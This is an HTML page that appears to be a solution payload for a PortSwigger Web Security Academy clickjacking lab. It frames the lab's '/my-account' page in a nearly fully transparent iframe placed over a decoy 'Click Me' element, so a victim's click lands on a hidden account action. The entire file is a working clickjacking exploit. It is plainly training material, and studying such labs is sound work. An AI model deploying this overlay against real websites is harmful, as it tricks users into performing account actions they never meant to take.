<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        iframe {
            position:relative;
            width:1000px;
            height: 700px;
            opacity: 0.000000001;
            z-index: 2;
        }
        div {
            position:absolute;
            top: 500px;
            left: 70px;
            z-index: 1;
            font-size: 2em;
        }
    </style>
    <title>Document</title>
</head>
<body>
    
    <div>Click Me</div>
    <iframe src="https://0af900bf038d4f4d83853dfc00190056.web-security-academy.net/my-account"></iframe>
</body>
</html>
